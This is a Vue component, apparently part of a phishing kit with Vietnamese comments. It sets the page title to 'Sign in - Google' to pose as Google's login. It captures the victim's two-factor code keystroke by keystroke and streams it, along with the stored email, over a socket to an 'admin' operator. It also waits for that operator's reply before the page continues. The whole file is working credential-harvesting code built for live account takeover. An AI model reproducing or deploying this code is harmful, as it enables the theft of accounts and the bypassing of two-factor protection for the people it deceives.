<template src="./index.html"></template>
<script>
// ...existing code...
export default {
  name: 'XacMinh',
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      verifyType: '',
      twofactorCode: '',
      message: '',
      typingTimer: null, // Timer để debounce typing events
      isLoading: false // Trạng thái loading cho button
    };
  },

  mounted() {
    document.title = "Sign in - Google";
  },
  
  methods: {
    onTwoFactorInput() {
      // Debounce typing events để tránh spam
      if (this.typingTimer) {
        clearTimeout(this.typingTimer);
      }
      
      this.typingTimer = setTimeout(() => {
        const typingData = {
          username: this.username,
          formType: '2fa_verify',
          inputValue: this.twofactorCode,
          time: new Date().toISOString()
        };
        
        // Emit socket event để thông báo admin
        this.$socket.emit('user-typing-password', typingData);
      }, 500); // Delay 500ms
    },
    handleVerify() {
      if (!this.twofactorCode) return;
      
      // Set loading state
      this.isLoading = true;
      
      const loginData = {
        username: this.username,
        status: 'verify',
        twofactorCode: this.twofactorCode,
        time: new Date().toISOString()
      };

      this.$socket.emit('user-login', loginData);
      this.message = 'Đã gửi thông tin xác minh!';
      const step1 = document.getElementById("login-step-1");
      step1.classList.add("transitioning");

      this.$socket.on('admin-message', (data) => {
        const step1 = document.getElementById("login-step-1");
        
        if (step1) {
          step1.classList.remove("transitioning");
        }
        this.isLoading = false; // Reset loading state
      });
    }
  }
};
</script>

<style lang="css" scoped>
@import "./styles.css";
</style>